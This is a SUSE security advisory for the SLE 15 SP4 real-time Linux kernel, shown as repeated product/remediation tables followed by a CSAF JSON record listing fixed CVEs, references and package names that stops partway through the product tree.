| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.9 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.1 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
6.1 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
References
203 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 15 SP4 RT kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2024-46854: net: dpaa: Pad packets to ETH_ZLEN (bsc#1231084).\n- CVE-2025-21738: ata: libata-sff: Ensure that we cannot write outside the allocated buffer (bsc#1238917).\n- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).\n- CVE-2025-68312: usbnet: Prevents free active kevent (bsc#1255171).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n (bsc#1256645).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23004: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() (bsc#1257231).\n- CVE-2026-23060: crypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec (bsc#1257735).\n- CVE-2026-23074: net/sched: Enforce that teql can only be used as root qdisc (bsc#1257749).\n- CVE-2026-23089: ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (bsc#1257790).\n- CVE-2026-23191: ALSA: aloop: Fix racy access at PCM trigger (bsc#1258395).\n- CVE-2026-23204: net: add skb_header_pointer_careful() helper (bsc#1258340).\n- CVE-2026-23209: macvlan: fix error recovery in macvlan_common_newlink() (bsc#1258518).\n- CVE-2026-23268: apparmor: fix unprivileged local user can do privileged policy management (bsc#1258850).\n- CVE-2026-23269: apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1259857).\n\nThe following non security issues were fixed:\n\n- apparmor: fix differential encoding verification (bsc#1258849).\n- apparmor: Fix double free of ns_name in aa_replace_profiles() (bsc#1258849).\n- apparmor: fix memory leak in verify_header (bsc#1258849).\n- apparmor: fix missing bounds check on DEFAULT table in verify_dfa() (bsc#1258849).\n- apparmor: fix race between freeing data and fs accessing it (bsc#1258849).\n- apparmor: fix race on rawdata dereference (bsc#1258849).\n- apparmor: fix side-effect bug in match_char() macro usage (bsc#1258849).\n- apparmor: fix unprivileged local user can do privileged policy management (bsc#1258849).\n- apparmor: fix: limit the number of levels of policy namespaces (bsc#1258849).\n- apparmor: replace recursive profile removal with iterative approach (bsc#1258849).\n- apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1258849).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: tcp: send zero-window ACK when no memory (bsc#1254767).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- tcp: correct handling of extreme memory squeeze (bsc#1254767).\n- x86/its: Fix crash during dynamic its initialization (bsc#1257771).\n- x86/modules: Set VM_FLUSH_RESET_PERMS in module_alloc() (bsc#1257771).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1131,SUSE-SLE-Micro-5.3-2026-1131,SUSE-SLE-Micro-5.4-2026-1131",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1131-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1131-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261131-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1131-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/045154.html"
},
{
"category": "self",
"summary": "SUSE Bug 1220137",
"url": "https://bugzilla.suse.com/1220137"
},
{
"category": "self",
"summary": "SUSE Bug 1220144",
"url": "https://bugzilla.suse.com/1220144"
},
{
"category": "self",
"summary": "SUSE Bug 1223007",
"url": "https://bugzilla.suse.com/1223007"
},
{
"category": "self",
"summary": "SUSE Bug 1231084",
"url": "https://bugzilla.suse.com/1231084"
},
{
"category": "self",
"summary": "SUSE Bug 1233038",
"url": "https://bugzilla.suse.com/1233038"
},
{
"category": "self",
"summary": "SUSE Bug 1235905",
"url": "https://bugzilla.suse.com/1235905"
},
{
"category": "self",
"summary": "SUSE Bug 1236104",
"url": "https://bugzilla.suse.com/1236104"
},
{
"category": "self",
"summary": "SUSE Bug 1236208",
"url": "https://bugzilla.suse.com/1236208"
},
{
"category": "self",
"summary": "SUSE Bug 1237885",
"url": "https://bugzilla.suse.com/1237885"
},
{
"category": "self",
"summary": "SUSE Bug 1237906",
"url": "https://bugzilla.suse.com/1237906"
},
{
"category": "self",
"summary": "SUSE Bug 1238414",
"url": "https://bugzilla.suse.com/1238414"
},
{
"category": "self",
"summary": "SUSE Bug 1238754",
"url": "https://bugzilla.suse.com/1238754"
},
{
"category": "self",
"summary": "SUSE Bug 1238763",
"url": "https://bugzilla.suse.com/1238763"
},
{
"category": "self",
"summary": "SUSE Bug 1238917",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "self",
"summary": "SUSE Bug 1244758",
"url": "https://bugzilla.suse.com/1244758"
},
{
"category": "self",
"summary": "SUSE Bug 1244904",
"url": "https://bugzilla.suse.com/1244904"
},
{
"category": "self",
"summary": "SUSE Bug 1245110",
"url": "https://bugzilla.suse.com/1245110"
},
{
"category": "self",
"summary": "SUSE Bug 1248306",
"url": "https://bugzilla.suse.com/1248306"
},
{
"category": "self",
"summary": "SUSE Bug 1248377",
"url": "https://bugzilla.suse.com/1248377"
},
{
"category": "self",
"summary": "SUSE Bug 1249156",
"url": "https://bugzilla.suse.com/1249156"
},
{
"category": "self",
"summary": "SUSE Bug 1249158",
"url": "https://bugzilla.suse.com/1249158"
},
{
"category": "self",
"summary": "SUSE Bug 1249827",
"url": "https://bugzilla.suse.com/1249827"
},
{
"category": "self",
"summary": "SUSE Bug 1252785",
"url": "https://bugzilla.suse.com/1252785"
},
{
"category": "self",
"summary": "SUSE Bug 1253028",
"url": "https://bugzilla.suse.com/1253028"
},
{
"category": "self",
"summary": "SUSE Bug 1253409",
"url": "https://bugzilla.suse.com/1253409"
},
{
"category": "self",
"summary": "SUSE Bug 1254462",
"url": "https://bugzilla.suse.com/1254462"
},
{
"category": "self",
"summary": "SUSE Bug 1254463",
"url": "https://bugzilla.suse.com/1254463"
},
{
"category": "self",
"summary": "SUSE Bug 1254464",
"url": "https://bugzilla.suse.com/1254464"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1255075",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "self",
"summary": "SUSE Bug 1255171",
"url": "https://bugzilla.suse.com/1255171"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1257231",
"url": "https://bugzilla.suse.com/1257231"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257732",
"url": "https://bugzilla.suse.com/1257732"
},
{
"category": "self",
"summary": "SUSE Bug 1257735",
"url": "https://bugzilla.suse.com/1257735"
},
{
"category": "self",
"summary": "SUSE Bug 1257749",
"url": "https://bugzilla.suse.com/1257749"
},
{
"category": "self",
"summary": "SUSE Bug 1257771",
"url": "https://bugzilla.suse.com/1257771"
},
{
"category": "self",
"summary": "SUSE Bug 1257790",
"url": "https://bugzilla.suse.com/1257790"
},
{
"category": "self",
"summary": "SUSE Bug 1258340",
"url": "https://bugzilla.suse.com/1258340"
},
{
"category": "self",
"summary": "SUSE Bug 1258395",
"url": "https://bugzilla.suse.com/1258395"
},
{
"category": "self",
"summary": "SUSE Bug 1258518",
"url": "https://bugzilla.suse.com/1258518"
},
{
"category": "self",
"summary": "SUSE Bug 1258849",
"url": "https://bugzilla.suse.com/1258849"
},
{
"category": "self",
"summary": "SUSE Bug 1258850",
"url": "https://bugzilla.suse.com/1258850"
},
{
"category": "self",
"summary": "SUSE Bug 1259857",
"url": "https://bugzilla.suse.com/1259857"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-49604 page",
"url": "https://www.suse.com/security/cve/CVE-2022-49604/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-49943 page",
"url": "https://www.suse.com/security/cve/CVE-2022-49943/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-49980 page",
"url": "https://www.suse.com/security/cve/CVE-2022-49980/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50232 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50232/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-52433 page",
"url": "https://www.suse.com/security/cve/CVE-2023-52433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-52923 page",
"url": "https://www.suse.com/security/cve/CVE-2023-52923/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53178 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53407 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53407/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53412 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53412/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53417 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53418 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53418/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26581 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26832 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26832/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-46854 page",
"url": "https://www.suse.com/security/cve/CVE-2024-46854/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-50143 page",
"url": "https://www.suse.com/security/cve/CVE-2024-50143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21658 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21658/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21760 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21760/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21765 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21765/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21766 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38563 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38563/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38565 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38565/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38684 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38684/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40044 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40044/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40139 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40139/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40242 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40242/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23004 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23004/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23054 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23054/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23060 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23060/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23074 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23074/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23089 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23191 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23191/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23204 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23209 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23268 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23268/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23269 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23269/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-03-27T16:02:21Z",
"generator": {
"date": "2026-03-27T16:02:21Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1131-1",
"initial_release_date": "2026-03-27T16:02:21Z",
"revision_history": [
{
"date": "2026-03-27T16:02:21Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-rt-5.14.21-150400.15.145.1.noarch",
"product": {
"name": "kernel-devel-rt-5.14.21-150400.15.145.1.noarch",
"product_id": "kernel-devel-rt-5.14.21-150400.15.145.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"product": {
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"product_id": "kernel-source-rt-5.14.21-150400.15.145.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "cluster-md-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "cluster-md-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "dlm-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "dlm-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "gfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "gfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-devel-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-devel-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-extra-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-extra-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-extra-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-livepatch-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-livepatch-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-devel-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-livepatch-devel-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-livepatch-devel-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-optional-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-optional-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-optional-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt_debug-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt_debug-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt_debug-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt_debug-devel-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt_debug-devel-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt_debug-devel-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-syms-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-syms-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-syms-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kselftests-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "kselftests-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "ocfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "ocfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-rt-5.14.21-150400.15.145.1.x86_64",
